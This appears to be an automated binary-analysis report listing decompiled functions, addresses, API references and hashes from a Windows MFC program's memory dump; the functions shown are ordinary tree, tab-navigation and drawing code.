Opcode Fuzzy Hash: aaa0718c1c03cc9cf4a071a7cf5c62624e363ccac82913c361582fb7333b2c36
Instruction Fuzzy Hash: 14F0AF31A10528ABCB04EF81E852BEEB774EF40318F50401FF00167182CB786A05CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004016B3, Relevance: 12.2, APIs: 8, Instructions: 235
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E004016B3(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t124;
				intOrPtr* _t129;
				intOrPtr _t140;
				intOrPtr _t141;
				intOrPtr* _t144;
				intOrPtr _t145;
				intOrPtr _t146;
				intOrPtr _t149;
				intOrPtr* _t150;
				void* _t153;
				intOrPtr* _t154;
				intOrPtr* _t165;
				intOrPtr _t167;
				intOrPtr _t173;
				intOrPtr* _t180;
				intOrPtr _t182;
				void* _t194;
				intOrPtr* _t195;
				signed int _t196;
				void* _t198;
				intOrPtr* _t199;
				intOrPtr* _t200;
				intOrPtr _t201;
				intOrPtr* _t202;
				void* _t204;

				L004269E6();
				 *((intOrPtr*)(_t204 - 0x10)) = __ecx;
				_t195 =  *((intOrPtr*)(_t204 + 0xc));
				L00401A5F(_t204 + 0xc);
				 *((intOrPtr*)(_t204 - 0x14)) = _t195;
				__imp__??0_Lockit@std@@QAE@XZ(_t194, _t198, _t153);
				_t154 =  *_t195;
				_t124 =  *0x442310;
				 *(_t204 - 4) =  *(_t204 - 4) & 0x00000000;
				if(_t154 != _t124) {
					_t199 =  *((intOrPtr*)(_t195 + 8));
					if(_t199 == _t124) {
						goto L18;
					}
					__imp__??0_Lockit@std@@QAE@XZ();
					_t144 =  *_t199;
					_t182 =  *0x442310;
					while(_t144 != _t182) {
						_t199 = _t144;
						_t144 =  *_t199;
					}
					__imp__??1_Lockit@std@@QAE@XZ();
					_t154 =  *((intOrPtr*)(_t199 + 8));
					 *((intOrPtr*)(_t204 - 0x14)) = _t199;
					if(_t199 == _t195) {
						_t124 =  *0x442310;
						goto L18;
					}
					_t145 =  *_t195;
					 *_t199 = _t145;
					 *((intOrPtr*)(_t145 + 4)) = _t199;
					_t146 =  *((intOrPtr*)(_t195 + 8));
					if(_t199 != _t146) {
						 *((intOrPtr*)(_t199 + 8)) = _t146;
						 *((intOrPtr*)(_t154 + 4)) =  *((intOrPtr*)(_t199 + 4));
						 *((intOrPtr*)( *((intOrPtr*)(_t195 + 8)) + 4)) = _t199;
						 *((intOrPtr*)( *((intOrPtr*)(_t199 + 4)))) = _t154;
					} else {
						 *((intOrPtr*)(_t154 + 4)) = _t199;
					}
					_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t204 - 0x10)) + 4));
					if( *((intOrPtr*)(_t149 + 4)) != _t195) {
						_t150 =  *((intOrPtr*)(_t195 + 4));
						if( *_t150 != _t195) {
							 *((intOrPtr*)(_t150 + 8)) = _t199;
						} else {
							 *_t150 = _t199;
						}
					} else {
						 *((intOrPtr*)(_t149 + 4)) = _t199;
					}
					 *((intOrPtr*)(_t199 + 4)) =  *((intOrPtr*)(_t195 + 4));
					 *((intOrPtr*)(_t199 + 0x14)) =  *((intOrPtr*)(_t195 + 0x14));
					 *((intOrPtr*)(_t195 + 0x14)) =  *((intOrPtr*)(_t199 + 0x14));
					 *((intOrPtr*)(_t204 - 0x14)) = _t195;
					goto L35;
				} else {
					_t154 =  *((intOrPtr*)(_t195 + 8));
					L18:
					 *((intOrPtr*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t204 - 0x14)) + 4));
					_t161 =  *((intOrPtr*)(_t204 - 0x10));
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t204 - 0x10)) + 4));
					if( *((intOrPtr*)(_t200 + 4)) != _t195) {
						_t161 =  *((intOrPtr*)(_t195 + 4));
						if( *_t161 != _t195) {
							 *((intOrPtr*)(_t161 + 8)) = _t154;
						} else {
							 *_t161 = _t154;
						}
					} else {
						 *((intOrPtr*)(_t200 + 4)) = _t154;
					}
					if( *_t200 != _t195) {
						L30:
						if( *((intOrPtr*)(_t200 + 8)) == _t195) {
							if( *_t195 != _t124) {
								_t140 = L004015BE(_t161, _t154);
							} else {
								_t140 =  *((intOrPtr*)(_t195 + 4));
							}
							 *((intOrPtr*)(_t200 + 8)) = _t140;
						}
						L35:
						_t201 =  *((intOrPtr*)(_t204 - 0x14));
						_t196 = 1;
						if( *((intOrPtr*)(_t201 + 0x14)) != _t196) {
							L56:
							L00425DF0();
							_t125 =  *((intOrPtr*)(_t204 - 0x10));
							_t202 =  *((intOrPtr*)(_t204 + 8));
							 *(_t204 - 4) =  *(_t204 - 4) | 0xffffffff;
							 *((intOrPtr*)(_t125 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t204 - 0x10)) + 0xc)) - 1;
							 *_t202 =  *((intOrPtr*)(_t204 + 0xc));
							__imp__??1_Lockit@std@@QAE@XZ(_t201);
							 *[fs:0x0] =  *((intOrPtr*)(_t204 - 0xc));
							return _t202;
						} else {
							goto L36;
						}
						while(1) {
							L36:
							_t187 =  *((intOrPtr*)(_t204 - 0x10));
							if(_t154 ==  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t204 - 0x10)) + 4)) + 4)) ||  *(_t154 + 0x14) != _t196) {
								break;
							}
							_t165 =  *((intOrPtr*)(_t154 + 4));
							if(_t154 !=  *_t165) {
								_t129 =  *_t165;
								if( *(_t129 + 0x14) == 0) {
									 *(_t129 + 0x14) = _t196;
									 *(_t165 + 0x14) =  *(_t165 + 0x14) & 0x00000000;
									L004017E4(_t187, _t165);
									_t165 =  *((intOrPtr*)(_t154 + 4));
									_t129 =  *_t165;
								}
								if( *( *((intOrPtr*)(_t129 + 8)) + 0x14) != _t196 ||  *( *_t129 + 0x14) != _t196) {
									if( *( *_t129 + 0x14) == _t196) {
										 *(_t129 + 0x14) =  *(_t129 + 0x14) & 0x00000000;
										 *( *((intOrPtr*)(_t129 + 8)) + 0x14) = _t196;
										L00401B45( *((intOrPtr*)(_t204 - 0x10)), _t129);
										_t129 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4))));
									}
									_t167 =  *((intOrPtr*)(_t154 + 4));
									 *(_t129 + 0x14) =  *(_t167 + 0x14);
									 *(_t167 + 0x14) = _t196;
									 *( *_t129 + 0x14) = _t196;
									L004017E4( *((intOrPtr*)(_t204 - 0x10)), _t167);
									break;
								} else {
									L48:
									 *(_t129 + 0x14) =  *(_t129 + 0x14) & 0x00000000;
									_t154 = _t165;
									continue;
								}
							}
							_t129 =  *((intOrPtr*)(_t165 + 8));
							if( *(_t129 + 0x14) == 0) {
								 *(_t129 + 0x14) = _t196;
								 *(_t165 + 0x14) =  *(_t165 + 0x14) & 0x00000000;
								L00401B45(_t187, _t165);
								_t165 =  *((intOrPtr*)(_t154 + 4));
								_t129 =  *((intOrPtr*)(_t165 + 8));
							}
							if( *( *_t129 + 0x14) != _t196 ||  *( *((intOrPtr*)(_t129 + 8)) + 0x14) != _t196) {
								if( *( *((intOrPtr*)(_t129 + 8)) + 0x14) == _t196) {
									 *(_t129 + 0x14) =  *(_t129 + 0x14) & 0x00000000;
									 *( *_t129 + 0x14) = _t196;
									L004017E4( *((intOrPtr*)(_t204 - 0x10)), _t129);
									_t129 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 8));
								}
								_t173 =  *((intOrPtr*)(_t154 + 4));
								 *(_t129 + 0x14) =  *(_t173 + 0x14);
								 *(_t173 + 0x14) = _t196;
								 *( *((intOrPtr*)(_t129 + 8)) + 0x14) = _t196;
								L00401B45( *((intOrPtr*)(_t204 - 0x10)), _t173);
								break;
							} else {
								goto L48;
							}
						}
						 *(_t154 + 0x14) = _t196;
						goto L56;
					} else {
						if( *((intOrPtr*)(_t195 + 8)) != _t124) {
							 *((intOrPtr*)(_t204 - 0x18)) = _t154;
							__imp__??0_Lockit@std@@QAE@XZ();
							_t180 =  *_t154;
							_t141 =  *0x442310;
							while(_t180 != _t141) {
								 *((intOrPtr*)(_t204 - 0x18)) = _t180;
								_t180 =  *_t180;
							}
							_t161 = _t204 - 0x20;
							__imp__??1_Lockit@std@@QAE@XZ();
							_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t204 - 0x10)) + 4));
							 *_t200 =  *((intOrPtr*)(_t204 - 0x18));
							_t124 =  *0x442310;
							goto L30;
						}
						_t161 =  *((intOrPtr*)(_t195 + 4));
						 *_t200 =  *((intOrPtr*)(_t195 + 4));
						goto L30;
					}
				}
			}

0x00425498
0x004254a1
0x004254a6
0x004254ac
0x004254b4
0x004254b7
0x004254bd
0x004254bf
0x004254c4
0x004254ca
0x004254d4
0x004254d9
0x00000000
0x00000000
0x004254e2
0x004254e8
0x004254ea
0x004254f0
0x004254f4
0x004254f6
0x004254f6
0x004254fd
0x00425503
0x00425508
0x0042550b
0x0042556c
0x00000000
0x0042556c
0x0042550d
0x0042550f
0x00425511
0x00425514
0x00425519
0x00425523
0x00425529
0x0042552f
0x00425532
0x0042551b
0x0042551b
0x0042551b
0x00425537
0x0042553d
0x00425544
0x00425549
0x0042554f
0x0042554b
0x0042554b
0x0042554b
0x0042553f
0x0042553f
0x0042553f
0x00425558
0x0042555e
0x00425561
0x00425564
0x00000000
0x004254cc
0x004254cc
0x00425571
0x00425577
0x0042557a
0x0042557d
0x00425583
0x0042558a
0x0042558f
0x00425595
0x00425591
0x00425591
0x00425591
0x00425585
0x00425585
0x00425585
0x0042559a
0x004255df
0x004255e2
0x004255e6
0x004255ee
0x004255e8
0x004255e8
0x004255e8
0x004255f4
0x004255f4
0x004255f7
0x004255f7
0x004255fc
0x00425600
0x00425703
0x00425704
0x00425709
0x0042570c
0x0042570f
0x00425714
0x0042571d
0x0042571f
0x0042572d
0x00425735
0x00000000
0x00000000
0x00000000
0x00425606
0x00425606
0x00425606
0x0042560f
0x00000000
0x00000000
0x0042561e
0x00425623
0x00425654
0x0042565a
0x0042565c
0x0042565f
0x00425666
0x0042566b
0x0042566e
0x0042566e
0x00425676
0x004256cc
0x004256d1
0x004256d6
0x004256dc
0x004256e4
0x004256e4
0x004256e6
0x004256ed
0x004256f2
0x004256f8
0x004256fb
0x00000000
0x0042567f
0x0042567f
0x0042567f
0x00425683
0x00000000
0x00425683
0x00425676
0x00425625
0x0042562c
0x0042562e
0x00425631
0x00425638
0x0042563d
0x00425640
0x00425640
0x00425648
0x00425690
0x00425694
0x00425699
0x0042569f
0x004256a7
0x004256a7
0x004256aa
0x004256b1
0x004256b7
0x004256bd
0x004256c0
0x00000000
0x00425652
0x00000000
0x00425652
0x00425648
0x00425700
0x00000000
0x0042559c
0x0042559f
0x004255ab
0x004255ae
0x004255b4
0x004255b6
0x004255bb
0x004255bf
0x004255c2
0x004255c2
0x004255c6
0x004255c9
0x004255d2
0x004255d8
0x004255da
0x00000000
0x004255da
0x004255a1
0x004255a4
0x00000000
0x004255a4
0x0042559a

APIs

_EH_prolog.MSVCRT ref: 00425498
??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 004254B7
??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 004254E2
??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 004254FD
??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 004255AE
??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 004255C9
#825.MFC42(?), ref: 00425704
??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 0042571F

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockit@std@@$??0_??1_$#825H_prolog
String ID:
API String ID: 741266746-0
Opcode ID: d3de3422e4da1f999129699302c6b2675a9bce95afd0fe49a15511ca9dbdaf5f
Instruction ID: 0084ec15d44f77e6c7c7fa0f9e1be74a8dc5bb486ee7b904dfb43b366d4907d5
Opcode Fuzzy Hash: d3de3422e4da1f999129699302c6b2675a9bce95afd0fe49a15511ca9dbdaf5f
Instruction Fuzzy Hash: D8B12974A01A11DFCB14CF44E18496ABBF2FF48315BA084AEE45A9B361D734ED81CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004240C6, Relevance: 12.1, APIs: 8, Instructions: 116
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004240C6(void* __ecx, char _a4) {
				void* __ebp;
				intOrPtr _t24;
				intOrPtr* _t26;
				intOrPtr _t28;
				void* _t32;
				struct HWND__* _t33;
				intOrPtr _t34;
				signed short _t35;
				intOrPtr _t39;
				char _t42;
				void* _t51;
				intOrPtr* _t52;
				intOrPtr* _t53;
				struct HWND__* _t54;
				intOrPtr _t55;
				signed int _t58;

				_t53 = _a4;
				_t51 = __ecx;
				_t24 =  *((intOrPtr*)(_t53 + 4));
				if(_t24 != 0x100) {
					if(_t24 != 0x104) {
						L26:
						return 0;
					}
					_t26 =  *((intOrPtr*)(__ecx + 0x34));
					_t42 =  *_t26;
					_a4 = _t42;
					if(_t42 == _t26) {
						goto L26;
					} else {
						goto L23;
					}
					do {
						L23:
						_t28 =  *((intOrPtr*)(_a4 + 0x10));
						if( *((char*)(_t28 + 0x44)) !=  *((intOrPtr*)(_t53 + 8))) {
							goto L25;
						}
						_push(_t28);
						if(L00401389(_t51) != 0) {
							L20:
							_t32 = 1;
							return _t32;
						}
						L25:
						L00401A5F( &_a4);
					} while (_a4 !=  *((intOrPtr*)(_t51 + 0x34)));
					goto L26;
				}
				if( *((intOrPtr*)(__ecx + 0x40)) == 0 ||  *((intOrPtr*)(_t53 + 8)) != 9) {
					goto L26;
				} else {
					_t33 = GetAsyncKeyState(0x11);
					if(_t33 == 0) {
						goto L26;
					}
					_push( *_t53);
					L00426372();
					_push(__imp__#1842);
					_t54 = _t33;
					L004264F2();
					if(_t33 != 0) {
						goto L26;
					}
					while(_t54 != 0) {
						_push(__imp__#1945);
						L004264F2();
						if(_t33 != 0) {
							break;
						} else {
							_t33 = GetParent( *(_t54 + 0x20));
							_push(_t33);
							L00426372();
							_t54 = _t33;
							continue;
						}
					}
					_t34 = L004016A4(_t51, _t54);
					_t55 = _t34;
					if(_t55 == 0) {
						goto L26;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_push(0x42f1e0);
						L004264F2();
						if(_t34 != 0) {
							break;
						}
						_t55 =  *((intOrPtr*)(_t55 + 0x4c));
						if(_t55 != 0) {
							continue;
						}
						break;
					}
					if(_t55 == 0) {
						goto L26;
					}
					_t52 =  *((intOrPtr*)(_t55 + 0xc));
					_t35 = GetAsyncKeyState(0x10);
					_t39 =  *((intOrPtr*)(_t52 + 0x88));
					asm("sbb esi, esi");
					_a4 = _t39;
					_t58 =  ~( ~_t35);
					do {
						if(_t58 == 0) {
							_t39 = _t39 + 1;
							if(_t39 ==  *((intOrPtr*)(_t52 + 0x98))) {
								_t39 = 0;
							}
						} else {
							_t39 = _t39 - 1;
							if(_t39 < 0) {
								_t39 =  *((intOrPtr*)(_t52 + 0x98)) - 1;
							}
						}
						_push(1);
						_push(_t39);
					} while ( *((intOrPtr*)( *_t52 + 0xd4))() == 0 && _t39 != _a4);
					goto L20;
				}
			}

0x004240cb
0x004240cf
0x004240d1
0x004240d9
0x004241d3
0x0042420c
0x00000000
0x0042420c
0x004241d5
0x004241d8
0x004241dc
0x004241df
0x00000000
0x00000000
0x00000000
0x00000000
0x004241e1
0x004241e1
0x004241e4
0x004241ee
0x00000000
0x00000000
0x004241f0
0x004241fa
0x004241c9
0x004241cb
0x00000000
0x004241cb
0x004241fc
0x004241ff
0x00424207
0x00000000
0x004241e1
0x004240e3
0x00000000
0x004240f3
0x004240fb
0x00424100
0x00000000
0x00000000
0x00424106
0x00424108
0x0042410d
0x00424113
0x00424117
0x0042411e
0x00000000
0x00000000
0x00424124
0x00424128
0x00424130
0x00424137
0x00000000
0x00424139
0x0042413c
0x00424142
0x00424143
0x00424148
0x00000000
0x00424148
0x00424137
0x0042414f
0x00424154
0x00424158
0x00000000
0x00000000
0x00000000
0x00000000
0x0042415e
0x0042415e
0x00424161
0x00424166
0x0042416d
0x00000000
0x00000000
0x0042416f
0x00424174
0x00000000
0x00000000
0x00000000
0x00424174
0x00424178
0x00000000
0x00000000
0x0042417e
0x00424183
0x00424185
0x00424191
0x00424193
0x00424196
0x00424198
0x0042419a
0x004241a8
0x004241af
0x004241b1
0x004241b1
0x0042419c
0x0042419c
0x0042419d
0x004241a5
0x004241a5
0x0042419d
0x004241b5
0x004241b7
0x004241c0
0x00000000
0x00424198

APIs

GetAsyncKeyState.USER32(00000011), ref: 004240FB
#2864.MFC42(?), ref: 00424108
#4083.MFC42(?), ref: 00424117
#4083.MFC42(?), ref: 00424130
GetParent.USER32(?), ref: 0042413C
#2864.MFC42(00000000), ref: 00424143
#4083.MFC42(0042F1E0,00000000,?), ref: 00424166
GetAsyncKeyState.USER32(00000010), ref: 00424183

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4083$#2864AsyncState$Parent
String ID:
API String ID: 631876415-0
Opcode ID: 40f23ffce28ea7c0ddd3d7808f89d9c7e855f5600964cba2a47c0e769e9cb055
Instruction ID: 9220c0998511e636928ed3d51d67fc9b759bb7194e57ab6bd20025df68414239
Opcode Fuzzy Hash: 40f23ffce28ea7c0ddd3d7808f89d9c7e855f5600964cba2a47c0e769e9cb055
Instruction Fuzzy Hash: 7531E2317006319BCB259BA2E880A7B77E5FFA4790F85412AE80597351D778AC908BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040229D, Relevance: 12.1, APIs: 8, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040229D(intOrPtr* __ecx, intOrPtr _a4) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t27;
				void* _t29;
				intOrPtr _t32;
				struct HWND__* _t40;
				void* _t43;
				intOrPtr _t44;
				struct HWND__* _t45;
				void* _t59;
				intOrPtr* _t60;

				_t27 = _a4;
				_t60 = __ecx;
				if(_t27 == 0xffffffff) {
					L22:
					return 0;
				} else {
					if(_t27 ==  *((intOrPtr*)(__ecx + 0x88))) {
						L21:
						_t29 = 1;
						return _t29;
					}
					_t59 = L004010A5(__ecx, _t27);
					_t43 = 0;
					if( *((intOrPtr*)(_t59 + 0x10)) == 0 ||  *((intOrPtr*)(_t59 + 0x14)) == 0) {
						goto L22;
					} else {
						_t31 =  *((intOrPtr*)(__ecx + 0x88));
						if( *((intOrPtr*)(__ecx + 0x88)) == 0xffffffff) {
							L8:
							_t32 = 0;
							L9:
							_push( *((intOrPtr*)(_t59 + 4)));
							_push(_t32);
							if( *((intOrPtr*)( *_t60 + 0xd8))() == 0) {
								goto L22;
							}
							if( *((intOrPtr*)(_t60 + 0x88)) != 0xffffffff) {
								_push(0);
								L0042625E();
								_push(0);
								L00425E14();
							}
							_push(0 |  *((intOrPtr*)(_t59 + 0xc)) != 0x00000000);
							L0042625E();
							_push(5);
							L00425E14();
							L00426420();
							 *((intOrPtr*)(_t60 + 0x88)) = _v12;
							L0040206D(_t60);
							if(_t43 == 0) {
								_t44 = 0;
							} else {
								_t44 =  *((intOrPtr*)(_t43 + 4));
							}
							 *((intOrPtr*)( *_t60 + 0xdc))(_t44,  *((intOrPtr*)(_t59 + 4)));
							if(_v16 == 0) {
								goto L21;
							}
							_push( *((intOrPtr*)(_t60 + 0x20)));
							while(1) {
								_t40 = GetParent();
								_push(_t40);
								L00426372();
								_t45 = _t40;
								if(_t45 == 0) {
									break;
								}
								_push(__imp__#1842);
								L004264F2();
								if(_t40 != 0) {
									break;
								}
								_push( *((intOrPtr*)(_t45 + 0x20)));
							}
							L0040132A(_t60, _t45,  *((intOrPtr*)(_t59 + 4)));
							goto L21;
						}
						_t43 = L004010A5(__ecx, _t31);
						if(_t43 == 0) {
							goto L8;
						}
						_t32 =  *((intOrPtr*)(_t43 + 4));
						goto L9;
					}
				}
			}

0x004228f4
0x004228fe
0x00422900
0x00422a10
0x00000000
0x00422906
0x0042290c
0x00422a0b
0x00422a0d
0x00000000
0x00422a0d
0x00422918
0x0042291a
0x0042291f
0x00000000
0x0042292e
0x0042292e
0x00422937
0x0042294c
0x0042294c
0x0042294e
0x0042294e
0x00422955
0x0042295e
0x00000000
0x00000000
0x0042296b
0x00422970
0x00422972
0x0042297a
0x0042297c
0x0042297c
0x0042298c
0x0042298d
0x00422995
0x00422997
0x0042299f
0x004229aa
0x004229b0
0x004229b7
0x004229be
0x004229b9
0x004229b9
0x004229b9
0x004229c8
0x004229d3
0x00000000
0x00000000
0x004229d5
0x004229d8
0x004229d8
0x004229de
0x004229df
0x004229e4
0x004229e8
0x00000000
0x00000000
0x004229ea
0x004229f2
0x004229f9
0x00000000
0x00000000
0x004229fb
0x004229fb
0x00422a06
0x00000000
0x00422a06
0x00422941
0x00422945
0x00000000
0x00000000
0x00422947
0x00000000
0x00422947
0x0042291f

APIs

#2642.MFC42(00000000), ref: 00422972
#6215.MFC42(00000000,00000000), ref: 0042297C
#2642.MFC42(00000000), ref: 0042298D
#6215.MFC42(00000005,00000000), ref: 00422997
#5981.MFC42(00000005,00000000), ref: 0042299F
GetParent.USER32(?), ref: 004229D8
#2864.MFC42(00000000), ref: 004229DF
#4083.MFC42(00000000), ref: 004229F2

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2642#6215$#2864#4083#5981Parent
String ID:
API String ID: 4106181681-0
Opcode ID: e2f2a4d83141503f6fd03ad0a3285f52e3282a81c56a9b1b1ee7845cdfd56961
Instruction ID: 3add0e21ccb99a9d43c98b61573d049675cc4a78bf34853b7fc1bef2df387b18
Opcode Fuzzy Hash: e2f2a4d83141503f6fd03ad0a3285f52e3282a81c56a9b1b1ee7845cdfd56961
Instruction Fuzzy Hash: 8831C971300611BBC724EF70A985B17B295BF44310F90892FE55697691CBB8DC50C768

Uniqueness

Uniqueness Score: -1.00%

Function 0040F6C9, Relevance: 12.1, APIs: 8, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0040F6C9(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a20) {
				struct tagRECT _v20;
				intOrPtr _v24;
				intOrPtr _v36;
				char _v52;
				void* __ebp;
				void* _t29;
				intOrPtr _t36;
				long _t54;
				intOrPtr* _t58;
				signed int _t68;

				_t58 = __ecx;
				_t29 =  *((intOrPtr*)( *__ecx + 0x114))();
				if(_t29 != 0) {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_a20 = __ecx + 0xf0;
					L0040157D(__ecx + 0xf0,  &_v52);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t68 = L004020E0(__ecx);
					InflateRect( &_v20, 0xffffffff, 0xffffffff);
					if(_t68 == 0) {
						_t36 = _v20.top -  *((intOrPtr*)(_t58 + 0xec));
						_v20.top = _t36;
						_v20.bottom = _t36 + 3;
						_v20.right = _v36 + 0xfffffffd;
					} else {
						_t54 = _v20.left -  *((intOrPtr*)(_t58 + 0xec));
						_v20.left = _t54;
						_v20.right = _t54 + 3;
						_v20.top = _v24 + 3;
					}
					_push(GetSysColor(0x10));
					_push(GetSysColor(0x14));
					_push( &_v20);
					L004264D4();
					asm("sbb eax, eax");
					asm("sbb edi, edi");
					OffsetRect( &_v20,  ~_t68 & 0x00000003, ( ~_t68 & 0x000000fd) + 3);
					_push(GetSysColor(0x10));
					_push(GetSysColor(0x14));
					_push( &_v20);
					L004264D4();
					_push(_a4);
					return L00401DFC(_a20);
				}
				return _t29;
			}

0x0040f6d0
0x0040f6d4
0x0040f6dc
0x0040f6ea
0x0040f6eb
0x0040f6ec
0x0040f6f6
0x0040f6f8
0x0040f6fb
0x0040f705
0x0040f706
0x0040f707
0x0040f70a
0x0040f710
0x0040f71a
0x0040f722
0x0040f744
0x0040f74a
0x0040f750
0x0040f759
0x0040f724
0x0040f727
0x0040f72d
0x0040f733
0x0040f73c
0x0040f73c
0x0040f766
0x0040f76e
0x0040f772
0x0040f773
0x0040f77c
0x0040f785
0x0040f790
0x0040f79a
0x0040f7a2
0x0040f7a6
0x0040f7a7
0x0040f7ac
0x00000000
0x0040f7b8
0x0040f7bb

APIs

InflateRect.USER32(?,000000FF,000000FF), ref: 0040F71A
GetSysColor.USER32(00000010), ref: 0040F764
GetSysColor.USER32(00000014), ref: 0040F769
#2567.MFC42(?,00000000), ref: 0040F773
OffsetRect.USER32(?,00000000,-00000003), ref: 0040F790
GetSysColor.USER32(00000010), ref: 0040F798
GetSysColor.USER32(00000014), ref: 0040F79D
#2567.MFC42(?,00000000), ref: 0040F7A7

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$#2567Rect$InflateOffset
String ID:
API String ID: 225065167-0
Opcode ID: 09b4b30d175552a6a9b28c1bcd3a84ae72c041a889d9dc8c1bd146ce20cb96bf
Instruction ID: baa82c5226399619783ed2a17d0d5022a568870e24018bd6d1aa7922ede4dea4
Opcode Fuzzy Hash: 09b4b30d175552a6a9b28c1bcd3a84ae72c041a889d9dc8c1bd146ce20cb96bf
Instruction Fuzzy Hash: 2B312C76A0011DABCF10DFA8CC45AEEBBB9AF45310F04453AF915EB291D77495048BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415357, Relevance: 12.1, APIs: 8, Instructions: 87
COMMON

